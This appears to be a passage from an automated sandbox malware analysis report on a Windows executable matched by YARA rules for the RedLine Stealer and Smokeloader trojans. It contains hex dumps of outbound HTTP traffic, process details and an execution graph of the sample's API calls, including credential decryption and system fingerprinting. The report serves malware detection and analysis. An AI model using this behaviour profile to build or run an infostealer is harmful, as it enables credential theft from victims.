                                                                      2024-04-18 07:32:15 UTC15331OUTData Raw: a6 c5 55 8a 12 33 9f 9f 88 8e c0 65 2b 38 bd cd bb 5a b4 7a 4b 38 61 de 6c 6c cb e3 b5 ec da ba 3d 2e 44 0f b9 7e 64 d2 45 9e c6 c3 3d 13 6d 88 20 ce 36 2c 05 ec 1b 55 6d 17 8a 17 07 ed 85 96 51 aa 63 cc 0f 51 e6 f2 d5 ab da 92 ea f7 19 9c e5 ee 21 31 8e df b0 14 2a 69 79 6f 1b f8 9c 1e bf 7b 39 5f a9 ca ea 7b 6a 7c 5b cb f8 05 7c 86 9a 5d cc da c7 26 f3 b5 79 6d 49 de 51 03 37 a8 68 89 2d 8c ea b5 17 90 94 74 ac eb e2 0c ee 86 3f b8 24 b3 6a 9f ce c3 82 17 52 04 91 1e c7 d5 59 58 be 4f 0e 6d a5 3c 72 6e 2b e1 bc f1 3b 68 a5 26 a9 72 d7 42 8f 67 13 42 8e a1 1f eb 18 c7 ff a8 02 1c 98 f2 55 e7 14 31 04 49 2e e0 84 b3 ec 45 42 13 81 c9 d8 8f 03 d1 65 ec fe ab ea 3b c1 ba 25 cf c6 ea f4 5d 13 16 4b d8 87 d4 b0 ea 2c d7 98 ca be 73 0d 04 f4 7d 71 37 a3 b5 a4
                                                                      Data Ascii: U3e+8ZzK8all=.D~dE=m 6,UmQcQ!1*iyo{9_{j|[|]&ymIQ7h-t?$jRYXOm<rn+;h&rBgBU1I.EBe;%]K,s}q7
                                                                      2024-04-18 07:32:15 UTC15331OUTData Raw: eb 0d 0d 85 4c a5 2d ac 1b 2c 10 bf 0e 09 0d 2d 54 fb 0d cc 7b f5 7b 7e 2d bb e1 74 c2 77 b6 28 bf cc e1 dd 29 ef af 83 fa bf 86 82 66 3f 2d 4c 3a 78 f9 ea 0c dd 89 a9 58 72 9d 76 f5 1f 3f a5 53 91 3f 7c f7 09 83 6f b5 4b 6e 48 b0 dd b6 7a a6 5a 60 88 26 31 42 88 11 e5 6f f9 1c fe 44 10 d6 2e eb 0f 88 4f ff d7 dd e5 81 07 0f 03 3d 71 85 96 00 0a 20 4c eb 91 33 a3 73 83 61 26 c0 84 8c 03 78 09 67 82 32 26 15 ea fd 6a d0 15 6b c4 c3 b3 f0 bd 8c c7 01 a2 78 fd 6f 3c 28 f8 df 7e d2 e3 db 97 c9 3d 46 9d 2a 44 08 72 9c e2 19 ce 5c 1b 57 4b 9f 56 a5 d5 1f 59 18 1d 84 e1 e5 56 e2 4c 28 ed 2a 83 2a b0 dc 02 2e 7f cf 9a d7 81 c2 7c e0 fd 7e a3 05 bb 7e 3b b5 c2 1a 5e c2 0c c4 c3 b1 7c 27 73 a2 dc 75 e1 46 a5 ee 2e 3c 99 db bd b2 5e 71 1c 5c 5d 95 02 89 85 c0 f3 41
                                                                      Data Ascii: L-,-T{{~-tw()f?-L:xXrv?S?|oKnHzZ`&1BoD.O=q L3sa&xg2&jkxo<(~=F*Dr\WKVYVL(**.|~~;^|'suF.<^q\]A
                                                                      2024-04-18 07:32:15 UTC15331OUTData Raw: be c3 1d 6d 85 6d 82 30 50 02 0f 3b d5 06 c1 54 84 04 72 50 14 8b e6 a8 23 0f db 85 a7 b8 c1 6f 53 35 c1 e6 a1 16 d6 19 15 b1 5a 83 76 fe ee fa 32 52 67 bc 90 dd 52 71 87 90 b0 ac 29 10 a8 25 8d 12 c9 0c 88 0c fc 3c 85 a6 a1 bb fa 21 7c 9d 3e 4b 20 f7 5b f7 fb 5e d9 6f 6d ab 4d d6 63 4b 43 0c d1 d1 a0 ad 9f 0f ae cc 5e 67 76 05 46 5c ff f4 d4 58 e9 a1 01 96 62 10 86 57 a7 5b 0b fa f2 5a 5e 44 88 62 33 49 16 98 56 65 b2 71 29 1b 9b 6a 15 bc 13 22 eb 2e 2b 52 b0 13 6d 5a 51 8a 2e 75 8a 95 d7 a8 b7 66 7e 8e da cb 6b 25 66 1f cf 78 70 7c f8 91 d1 c8 15 4e f4 5e a8 af 01 14 d4 bc 55 32 73 12 fd 23 0b f6 51 dd b3 43 21 4a f7 87 93 4e 7d 67 cd 78 c1 a7 2b f8 82 ef 7b 75 cd ae 4e f2 1c da 25 ef 8a 7a 68 90 28 64 52 c4 e7 1d 42 90 72 8c 8c 3e ca 58 7c 53 08 af 1f
                                                                      Data Ascii: mm0P;TrP#oS5Zv2RgRq)%<!|>K [^omMcKC^gvF\XbW[Z^Db3IVeq)j".+RmZQ.uf~k%fxp|N^U2s#QC!JN}gx+{uN%zh(dRBr>X|S
                                                                      2024-04-18 07:32:15 UTC15331OUTData Raw: 3f 9b 84 f9 7b 84 95 49 ae 8a 0b 02 e5 3f df ba c4 dc 30 e2 db 9a 93 ba e6 95 d3 61 d3 38 4b 75 a3 aa b1 81 1e 2e e3 9b 6a e0 96 2b f5 70 e4 73 cd f6 11 c4 f6 0d 3e f9 99 2c 6e 51 81 8b e2 34 0f 79 9c ec 6e 12 7e da 67 fb 7d bf ff 5b aa 06 b0 69 95 f8 d2 13 99 20 ff 73 43 2e f3 60 0e a2 79 32 c2 bc f9 5b 70 27 bb b2 06 89 31 41 a5 96 37 cf 28 d7 2b 44 d0 c4 6f fa f9 4e d7 09 e0 70 36 0e 5d 47 a3 e9 e9 db 3c c7 44 3e 51 36 a9 9d 17 1d 37 77 cc 6b b0 75 82 3b 77 e4 33 08 d6 fd 2f 67 d9 b1 d9 5a 4a 60 92 73 08 18 ec f6 90 14 df fd cb d8 51 9c 71 5a bc f6 ff 8b 68 94 85 40 71 c6 de 7d 20 4d 68 57 cd c1 39 41 39 6a e1 15 83 4e 9d e9 1c c4 9d 3b e9 ed c3 00 1b 79 9c 07 b5 b9 51 1a 77 43 3e cd 10 5d ba e9 f6 bb a5 57 f5 f6 35 3d 2d 32 5f 6f 17 9a 8a f0 ff db 28
                                                                      Data Ascii: ?{I?0a8Ku.j+ps>,nQ4yn~g}[i sC.`y2[p'1A7(+DoNp6]G<D>Q67wku;w3/gZJ`sQqZh@q} MhW9A9jN;yQwC>]W5=-2_o(
                                                                      2024-04-18 07:32:15 UTC15331OUTData Raw: fe 4b de 1b a2 c9 2e 3d ca 88 00 14 11 f6 ba 30 77 3a bd ee f1 03 58 98 d3 0b d5 39 84 d0 5c 00 49 8d 7a 0c 63 20 ab 56 f8 ad 80 5c c1 7b 03 19 14 28 81 fc 59 c6 26 6a 3e 48 79 91 59 dc 78 8a 30 74 64 80 4e 60 66 09 c0 b4 8d 33 b8 fc 57 75 c2 6c f9 95 53 cc 3c 09 a6 43 7b 2a 89 c0 1a 16 8f b6 28 e8 6e 78 2f ac 18 a2 5b d9 bc df 14 41 0f eb b8 45 1c 7f fb e0 cf 00 14 25 43 c6 66 5f d6 3f 63 bc 56 28 6e 65 b0 c8 44 95 e4 9a 86 b6 89 cd ae b5 c6 12 a3 fd 28 66 70 dd b3 a0 ab 3b eb 6b 31 f2 37 0c 82 3f 3c ce 06 a8 64 47 49 98 d8 ee d7 ae 0e ad 4b e0 24 c1 65 cd d4 ec a3 11 d9 01 f3 32 b7 42 dc 9a c8 35 b6 e4 66 d4 07 67 e9 d8 a7 14 3b 08 b1 4c 5b 5b 99 02 85 c2 ac be 70 fc 1f 12 71 e4 ef 7c c1 bd 24 35 97 8b 43 58 3f af 50 c1 90 85 a3 28 ca bd 0a 2e 4e f0 8a
                                                                      Data Ascii: K.=0w:X9\Izc V\{(Y&j>HyYx0tdN`f3WulS<C{*(nx/[AE%Cf_?cV(neD(fp;k17?<dGIK$e2B5fg;L[[pq|$5CX?P(.N
                                                                      2024-04-18 07:32:16 UTC820INHTTP/1.1 200 OK
                                                                      Date: Thu, 18 Apr 2024 07:32:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=621me06sbsssq8qqttsg74fq1b; expires=Mon, 12-Aug-2024 01:18:55 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j%2FGTnmzmgHmU%2FzCzqMEYV5n%2FG6flzIn%2BrIfmU6mdDDH4MBLKC65chZim8NksL%2F3AwMtnMZ8RO263U1WM1K3JnwUTt091zU0kb7h%2FWS3%2BOZg9a8L7Da0SYdtcyBKemzQrwQ9K5AG411FAIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8762f5bc5a9b4557-ATL
                                                                      alt-svc: h3=":443"; ma=86400


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:09:32:06
                                                                      Start date:18/04/2024
                                                                      Path:C:\Users\user\Desktop\5Dw2hTQmiB.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\5Dw2hTQmiB.exe"
                                                                      Imagebase:0x400000
                                                                      File size:368'640 bytes
                                                                      MD5 hash:017ADC7DFB6B77DD2C14F7F7A4933F1C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1857426384.0000000002FA3000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:09:32:16
                                                                      Start date:18/04/2024
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 1624
                                                                      Imagebase:0x770000
                                                                      File size:483'680 bytes
                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:7.7%
                                                                        Dynamic/Decrypted Code Coverage:9%
                                                                        Signature Coverage:21.1%
                                                                        Total number of Nodes:332
                                                                        Total number of Limit Nodes:19
                                                                        execution_graph 21059 409240 21061 40924a 21059->21061 21060 4092ae ExitProcess 21062 40926b GetStdHandle ExitProcess 21061->21062 21063 40925e 21061->21063 21062->21063 21063->21060 21064 41cf40 21065 41cfa8 21064->21065 21066 41cf4b 21064->21066 21072 4359f0 21066->21072 21068 41cfb7 21069 4359f0 RtlAllocateHeap 21068->21069 21070 41d061 21069->21070 21070->21070 21075 41bd50 21070->21075 21073 435a7a RtlAllocateHeap 21072->21073 21074 435a3e 21072->21074 21073->21068 21074->21073 21078 41be80 21075->21078 21081 43a430 21078->21081 21080 41bed8 21082 43a450 21081->21082 21083 4359f0 RtlAllocateHeap 21082->21083 21085 43a474 21083->21085 21084 43a5ce 21084->21080 21085->21084 21087 435b70 21085->21087 21088 435ba0 21087->21088 21089 435b9d LdrInitializeThunk 21087->21089 21088->21084 21089->21084 21090 4391c0 21091 439201 21090->21091 21092 43924a RtlAllocateHeap 21090->21092 21091->21092 21093 43926a 21092->21093 21094 435bc0 21095 435c0f 21094->21095 21096 435b70 LdrInitializeThunk 21095->21096 21097 435c6e 21095->21097 21096->21097 21098 435dde 21097->21098 21099 435b70 LdrInitializeThunk 21097->21099 21099->21098 21100 42a245 21101 42a375 SysAllocString 21100->21101 21102 42a335 21100->21102 21103 42a3e7 21101->21103 21102->21101 21107 42f14f 21110 42f610 21107->21110 21111 42f661 21110->21111 21112 4359f0 RtlAllocateHeap 21111->21112 21113 42f719 21112->21113 21114 4265cc 21115 4265d3 21114->21115 21116 4266f2 GetPhysicallyInstalledSystemMemory 21115->21116 21117 42671a 21116->21117 21117->21117 21118 43914c 21119 4391a7 RtlReAllocateHeap 21118->21119 21120 43917d 21118->21120 21121 43926a 21119->21121 21120->21119 21122 4156ce 21123 4359f0 RtlAllocateHeap 21122->21123 21124 4156db 21123->21124 21127 43a8f0 21124->21127 21128 43a944 21127->21128 21130 435b70 LdrInitializeThunk 21128->21130 21131 43a9c8 21128->21131 21129 4156f0 21130->21131 21131->21129 21132 435b70 LdrInitializeThunk 21131->21132 21132->21129 21133 40d5d0 21134 40d59b 21133->21134 21134->21133 21135 40d817 ExitProcess ExitProcess ExitProcess ExitProcess 21134->21135 21136 40d812 21134->21136 21137 40da50 21135->21137 21136->21135 21138 4384d6 21140 4383ad 21138->21140 21139 4385df 21140->21139 21141 4384b4 LoadLibraryW 21140->21141 21142 4384bb 21141->21142 21143 415b57 21144 415b63 21143->21144 21145 4359f0 RtlAllocateHeap 21144->21145 21148 415c9e 21145->21148 21146 4359f0 RtlAllocateHeap 21146->21148 21147 416064 CryptUnprotectData 21147->21148 21148->21146 21148->21147 21149 4151d7 21150 4359f0 RtlAllocateHeap 21149->21150 21151 4151df 21150->21151 21152 43a8f0 LdrInitializeThunk 21151->21152 21153 4151f7 21152->21153 21154 41a8d9 21155 41a8ee 21154->21155 21156 4359f0 RtlAllocateHeap 21155->21156 21157 41aa59 21156->21157 21158 43a430 2 API calls 21157->21158 21159 41aabf 21158->21159 21160 4163d9 21161 4163ed 21160->21161 21161->21161 21162 4359f0 RtlAllocateHeap 21161->21162 21164 416417 21162->21164 21163 4359f0 RtlAllocateHeap 21165 4164e0 21163->21165 21164->21163 21165->21165 21168 43a610 21165->21168 21167 416561 21169 43a630 21168->21169 21170 4359f0 RtlAllocateHeap 21169->21170 21171 43a650 21170->21171 21172 43a78e 21171->21172 21173 435b70 LdrInitializeThunk 21171->21173 21172->21167 21173->21172 21174 419ddc 21175 419ef0 21174->21175 21182 415080 21175->21182 21177 419f51 21178 415080 RtlAllocateHeap LdrInitializeThunk 21177->21178 21179 41a0ac 21178->21179 21180 415080 RtlAllocateHeap LdrInitializeThunk 21179->21180 21181 41a249 21180->21181 21183 4150c0 21182->21183 21184 4359f0 RtlAllocateHeap 21183->21184 21185 41510b 21184->21185 21186 43a430 2 API calls 21185->21186 21187 41518f 21186->21187 21192 41c7e2 21193 41c801 21192->21193 21197 41cbf0 21193->21197 21213 4212b0 21193->21213 21194 41c841 21198 41cc06 21197->21198 21203 41ccb0 21197->21203 21199 4359f0 RtlAllocateHeap 21198->21199 21198->21203 21200 41cd17 21199->21200 21200->21200 21201 43a430 2 API calls 21200->21201 21202 41cd8d 21201->21202 21202->21203 21204 4359f0 RtlAllocateHeap 21202->21204 21203->21194 21205 41cd9d 21204->21205 21206 43a8f0 LdrInitializeThunk 21205->21206 21207 41cdaf 21206->21207 21208 4359f0 RtlAllocateHeap 21207->21208 21209 41cdef 21207->21209 21210 41cdfe 21208->21210 21209->21203 21211 435b70 LdrInitializeThunk 21209->21211 21210->21210 21219 409340 RtlAllocateHeap 21210->21219 21211->21203 21214 421430 21213->21214 21215 4212c9 21213->21215 21214->21194 21216 4359f0 RtlAllocateHeap 21215->21216 21217 421444 21216->21217 21217->21217 21218 41bd50 2 API calls 21217->21218 21218->21214 21219->21209 21220 4147e5 21221 4147f4 21220->21221 21244 41de10 21221->21244 21223 4147fa 21224 409d20 RtlAllocateHeap 21223->21224 21225 414804 21224->21225 21226 409d20 RtlAllocateHeap 21225->21226 21227 414820 21226->21227 21228 409d20 RtlAllocateHeap 21227->21228 21229 41483f 21228->21229 21230 421670 RtlAllocateHeap LdrInitializeThunk 21229->21230 21231 414854 21230->21231 21232 421f80 RtlAllocateHeap LdrInitializeThunk 21231->21232 21233 41485d 21232->21233 21234 409d20 RtlAllocateHeap 21233->21234 21235 414870 21234->21235 21236 422ff0 RtlAllocateHeap 21235->21236 21237 414885 21236->21237 21238 409d20 RtlAllocateHeap 21237->21238 21239 41488f 21238->21239 21240 424240 RtlAllocateHeap 21239->21240 21241 4148a4 21240->21241 21242 42dde0 6 API calls 21241->21242 21243 4148ad 21242->21243 21245 41de88 21244->21245 21246 4359f0 RtlAllocateHeap 21245->21246 21247 41df1b 21246->21247 21248 4359f0 RtlAllocateHeap 21247->21248 21249 41e024 21248->21249 21249->21249 21250 43a610 2 API calls 21249->21250 21251 41e097 21250->21251 21256 4139e7 21257 4139f4 21256->21257 21262 418640 21257->21262 21259 413a0d 21260 409d20 RtlAllocateHeap 21259->21260 21261 413a1b 21260->21261 21263 418660 21262->21263 21264 4359f0 RtlAllocateHeap 21263->21264 21265 418698 21264->21265 21266 43a610 2 API calls 21265->21266 21267 4186b9 21266->21267 21273 2fa33d6 21274 2fa33e1 21273->21274 21277 2fa3676 21274->21277 21278 2fa3685 21277->21278 21281 2fa3e16 21278->21281 21287 2fa3e31 21281->21287 21282 2fa3e3a CreateToolhelp32Snapshot 21283 2fa3e56 Module32First 21282->21283 21282->21287 21284 2fa3e65 21283->21284 21286 2fa3675 21283->21286 21288 2fa3ad5 21284->21288 21287->21282 21287->21283 21289 2fa3b00 21288->21289 21290 2fa3b49 21289->21290 21291 2fa3b11 VirtualAlloc 21289->21291 21290->21290 21291->21290 21297 41ed72 21300 43ace0 21297->21300 21302 43ad00 21300->21302 21301 41ed86 21302->21301 21303 435b70 LdrInitializeThunk 21302->21303 21303->21301 21304 418775 21305 4187dd 21304->21305 21306 41be80 2 API calls 21305->21306 21307 418816 21306->21307 21308 4373fe 21309 43744f 21308->21309 21310 4374af 21309->21310 21311 435b70 LdrInitializeThunk 21309->21311 21311->21310 21312 416800 21314 41680c 21312->21314 21313 4168ce 21314->21313 21315 435b70 LdrInitializeThunk 21314->21315 21315->21313 21316 41ed00 21317 41ed14 21316->21317 21320 43ae30 21317->21320 21319 41ed38 21322 43ae84 21320->21322 21321 4359f0 RtlAllocateHeap 21325 43af2b 21321->21325 21323 435b70 LdrInitializeThunk 21322->21323 21324 43aeee 21322->21324 21323->21324 21324->21321 21327 43afee 21324->21327 21326 435b70 LdrInitializeThunk 21325->21326 21325->21327 21326->21327 21327->21319 21328 425183 21331 42518d 21328->21331 21329 425bee GetComputerNameExA 21329->21331 21330 425cdb GetComputerNameExA 21330->21331 21331->21329 21331->21330 21331->21331 21336 412807 21337 412816 21336->21337 21342 4154a0 21337->21342 21339 412829 21340 409d20 RtlAllocateHeap 21339->21340 21341 412833 21340->21341 21343 4154c0 21342->21343 21344 4359f0 RtlAllocateHeap 21343->21344 21345 4154fe 21344->21345 21346 4359f0 RtlAllocateHeap 21345->21346 21347 4155fa 21346->21347 21347->21347 21348 43a430 2 API calls 21347->21348 21349 41567a 21348->21349 21350 416e0b 21353 418070 21350->21353 21354 41811e 21353->21354 21355 4359f0 RtlAllocateHeap 21354->21355 21356 4181ed 21355->21356 21357 4359f0 RtlAllocateHeap 21356->21357 21358 4183e5 21357->21358 21358->21358 21359 41bd50 2 API calls 21358->21359 21360 418566 21359->21360 21361 438312 21362 438323 21361->21362 21363 438355 LoadLibraryW 21361->21363 21362->21363 21364 411e90 21364->21364 21365 411e98 21364->21365 21366 41bd50 2 API calls 21365->21366 21367 411f60 21366->21367 21368 41bd50 2 API calls 21367->21368 21369 412040 21368->21369 21370 415390 21371 415396 21370->21371 21372 435b70 LdrInitializeThunk 21371->21372 21373 41546b 21372->21373 21374 2ee003c 21375 2ee0049 21374->21375 21389 2ee0e0f SetErrorMode SetErrorMode 21375->21389 21380 2ee0265 21381 2ee02ce VirtualProtect 21380->21381 21383 2ee030b 21381->21383 21382 2ee0439 VirtualFree 21387 2ee04be 21382->21387 21388 2ee05f4 LoadLibraryA 21382->21388 21383->21382 21384 2ee04e3 LoadLibraryA 21384->21387 21386 2ee08c7 21387->21384 21387->21388 21388->21386 21390 2ee0223 21389->21390 21391 2ee0d90 21390->21391 21392 2ee0dad 21391->21392 21393 2ee0dbb GetPEB 21392->21393 21394 2ee0238 VirtualAlloc 21392->21394 21393->21394 21394->21380 21405 415821 21406 415827 21405->21406 21407 4359f0 RtlAllocateHeap 21406->21407 21408 415947 21407->21408 21408->21408 21409 43a430 2 API calls 21408->21409 21410 4159cd 21409->21410 21419 4127a7 21422 414f10 21419->21422 21421 4127c3 21423 414f40 21422->21423 21424 4359f0 RtlAllocateHeap 21423->21424 21425 414f60 21424->21425 21426 4359f0 RtlAllocateHeap 21425->21426 21427 415000 21426->21427 21427->21421 21428 42e6ab 21432 4092e0 21428->21432 21430 42e6b0 KiUserCallbackDispatcher GetSystemMetrics 21431 42e6f8 21430->21431 21432->21430 21433 4340a8 21436 439a30 21433->21436 21435 4340cf GetVolumeInformationW 21437 43822f 21439 4372e0 21437->21439 21438 4382b8 21439->21438 21440 435b70 LdrInitializeThunk 21439->21440 21440->21439 21446 4179b1 21447 415080 2 API calls 21446->21447 21448 4179c3 21447->21448 21449 41ae30 21450 41ae80 21449->21450 21451 41ae3e 21449->21451 21452 4359f0 RtlAllocateHeap 21451->21452 21453 41ae94 21452->21453 21453->21450 21455 418850 21453->21455 21456 418913 21455->21456 21457 415080 2 API calls 21456->21457 21458 418987 21457->21458 21459 4209b6 21460 43ace0 LdrInitializeThunk 21459->21460 21461 4209d1 21460->21461 21468 417239 21469 41727f 21468->21469 21470 415080 2 API calls 21469->21470 21471 4172c5 21470->21471 21472 415080 2 API calls 21471->21472 21473 417355 21472->21473 21474 415080 2 API calls 21473->21474 21475 41742b 21474->21475 21476 415080 2 API calls 21475->21476 21477 4174d5 21476->21477 21478 4359f0 RtlAllocateHeap 21477->21478 21479 4175d0 21478->21479 21479->21479 21480 43a430 2 API calls 21479->21480 21481 41769e 21480->21481

                                                                        Executed Functions

                                                                        Function 00421670 Relevance: 10.5, Strings: 8, Instructions: 515COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 131 421670-4216a2 132 4216b0 131->132 133 4216de-421860 131->133 132->133 134 421862 133->134 135 421895-4218ad call 43ace0 133->135 136 421870-421893 134->136 139 421900 135->139 140 421920-42196f call 439100 135->140 141 4218f0 135->141 142 421906-421915 135->142 143 4218b4-4218d8 call 43b130 135->143 144 4218df-4218ea 135->144 136->135 136->136 139->142 149 421be2 140->149 150 421980-4219f3 call 408c50 call 43ae30 140->150 151 421be0 140->151 152 421d40-421d45 140->152 153 421c06-421c4b 140->153 154 421d26-421d30 140->154 155 421a07-421a16 call 43ace0 140->155 156 421d04-421d10 140->156 157 421a2a 140->157 158 421beb-421bef 140->158 159 421ced-421cf6 140->159 160 421bd0-421bd5 140->160 161 421a30-421a85 140->161 162 421bf0 140->162 163 421bf7-421bff 140->163 164 421d17-421d1f 140->164 165 421ade-421ae5 140->165 166 421adc 140->166 167 421cfd-421d02 140->167 141->139 142->140 143->140 143->141 143->144 144->141 149->158 199 4219f8-421a00 150->199 170 421c80-421c88 153->170 171 421c4d-421c4f 153->171 154->149 154->150 154->151 154->152 154->153 154->154 154->155 154->156 154->157 154->158 154->159 154->160 154->161 154->162 154->163 154->164 154->165 154->166 154->167 187 421a1b-421a23 155->187 156->152 156->154 156->164 157->160 158->162 159->152 159->154 159->156 159->164 159->167 160->151 168 421a87 161->168 169 421aba-421ac8 call 43b800 161->169 162->163 163->149 163->150 163->151 163->152 163->153 163->154 163->155 163->156 163->157 163->158 163->159 163->160 163->161 163->162 163->163 163->164 163->165 163->166 163->167 164->149 164->150 164->151 164->153 164->154 164->155 164->156 164->157 164->158 164->159 164->160 164->161 164->162 164->163 164->164 164->165 164->166 164->167 173 421b03 165->173 174 421ae7-421aef 165->174 172 421b11-421b46 166->172 167->156 177 421a90-421ab8 168->177 188 421acd-421ad5 169->188 180 421cd0-421ce6 call 43a210 170->180 181 421c8a-421c95 170->181 178 421c50-421c7e 171->178 185 421b48 172->185 186 421b7e-421b86 172->186 184 421b06-421b0e 173->184 182 421af0-421aff 174->182 177->169 177->177 178->170 178->178 180->152 180->154 180->156 180->159 180->164 180->167 189 421ca0-421ca7 181->189 182->182 190 421b01 182->190 184->172 192 421b50-421b7c 185->192 186->160 193 421b88-421b92 186->193 187->149 187->151 187->152 187->154 187->156 187->157 187->158 187->159 187->161 187->162 187->163 187->164 187->165 187->166 187->167 188->149 188->151 188->152 188->154 188->156 188->158 188->159 188->162 188->163 188->164 188->165 188->166 188->167 197 421cb0-421cb6 189->197 198 421ca9-421cac 189->198 190->184 192->186 192->192 196 421ba0-421ba7 193->196 202 421bb0-421bb6 196->202 203 421ba9-421bac 196->203 197->180 201 421cb8-421cc4 call 435b70 197->201 198->189 200 421cae 198->200 199->149 199->151 199->152 199->154 199->155 199->156 199->157 199->158 199->159 199->160 199->161 199->162 199->163 199->164 199->165 199->166 199->167 200->180 201->180 202->160 205 421bb8-421bc5 call 435b70 202->205 203->196 204 421bae 203->204 204->160 205->160
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: M.C$-Uk$@-t#$U=^3$e!}'$l9h?$m1w7$}%m;
                                                                        • API String ID: 0-2617895959
                                                                        • Opcode ID: dc5ec96d82ee0a7688af8c91d71848151db7db06c907d44b1775e57a573058f8
                                                                        • Instruction ID: 6a773ac881d51c05e7616f0b7475f283f1ec1e9526ef155ff2a7bcc4ebfbe97b
                                                                        • Opcode Fuzzy Hash: dc5ec96d82ee0a7688af8c91d71848151db7db06c907d44b1775e57a573058f8
                                                                        • Instruction Fuzzy Hash: F90259B5600B008BE328CF25D891B67B7E1FB89705F548A2DD5DA8BBA1EB74F405CB44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004216CE Relevance: 10.5, Strings: 8, Instructions: 462COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 210 4216ce-4216d7 211 4216b0 210->211 212 4216de-421860 210->212 211->212 213 421862 212->213 214 421895-4218a2 call 43ace0 212->214 215 421870-421893 213->215 217 4218a7-4218ad 214->217 215->214 215->215 218 421900 217->218 219 421920-421957 call 439100 217->219 220 4218f0 217->220 221 421906-421915 217->221 222 4218b4-4218d8 call 43b130 217->222 223 4218df-4218ea 217->223 218->221 226 42195c-42196f 219->226 220->218 221->219 222->219 222->220 222->223 223->220 228 421be2 226->228 229 421980-4219d8 call 408c50 226->229 230 421be0 226->230 231 421d40-421d45 226->231 232 421c06-421c4b 226->232 233 421d26-421d30 226->233 234 421a07-421a16 call 43ace0 226->234 235 421d04-421d10 226->235 236 421a2a 226->236 237 421beb-421bef 226->237 238 421ced-421cf6 226->238 239 421bd0-421bd5 226->239 240 421a30-421a85 226->240 241 421bf0 226->241 242 421bf7-421bff 226->242 243 421d17-421d1f 226->243 244 421ade-421ae5 226->244 245 421adc 226->245 246 421cfd-421d02 226->246 228->237 262 4219dd-4219f3 call 43ae30 229->262 249 421c80-421c88 232->249 250 421c4d-421c4f 232->250 233->228 233->229 233->230 233->231 233->232 233->233 233->234 233->235 233->236 233->237 233->238 233->239 233->240 233->241 233->242 233->243 233->244 233->245 233->246 266 421a1b-421a23 234->266 235->231 235->233 235->243 236->239 237->241 238->231 238->233 238->235 238->243 238->246 239->230 247 421a87 240->247 248 421aba-421ac8 call 43b800 240->248 241->242 242->228 242->229 242->230 242->231 242->232 242->233 242->234 242->235 242->236 242->237 242->238 242->239 242->240 242->241 242->242 242->243 242->244 242->245 242->246 243->228 243->229 243->230 243->232 243->233 243->234 243->235 243->236 243->237 243->238 243->239 243->240 243->241 243->242 243->243 243->244 243->245 243->246 252 421b03 244->252 253 421ae7-421aef 244->253 251 421b11-421b46 245->251 246->235 256 421a90-421ab8 247->256 267 421acd-421ad5 248->267 259 421cd0-421ce6 call 43a210 249->259 260 421c8a-421c95 249->260 257 421c50-421c7e 250->257 264 421b48 251->264 265 421b7e-421b86 251->265 263 421b06-421b0e 252->263 261 421af0-421aff 253->261 256->248 256->256 257->249 257->257 259->231 259->233 259->235 259->238 259->243 259->246 268 421ca0-421ca7 260->268 261->261 269 421b01 261->269 278 4219f8-421a00 262->278 263->251 271 421b50-421b7c 264->271 265->239 272 421b88-421b92 265->272 266->228 266->230 266->231 266->233 266->235 266->236 266->237 266->238 266->240 266->241 266->242 266->243 266->244 266->245 266->246 267->228 267->230 267->231 267->233 267->235 267->237 267->238 267->241 267->242 267->243 267->244 267->245 267->246 276 421cb0-421cb6 268->276 277 421ca9-421cac 268->277 269->263 271->265 271->271 275 421ba0-421ba7 272->275 281 421bb0-421bb6 275->281 282 421ba9-421bac 275->282 276->259 280 421cb8-421cc4 call 435b70 276->280 277->268 279 421cae 277->279 278->228 278->230 278->231 278->233 278->234 278->235 278->236 278->237 278->238 278->239 278->240 278->241 278->242 278->243 278->244 278->245 278->246 279->259 280->259 281->239 284 421bb8-421bc5 call 435b70 281->284 282->275 283 421bae 282->283 283->239 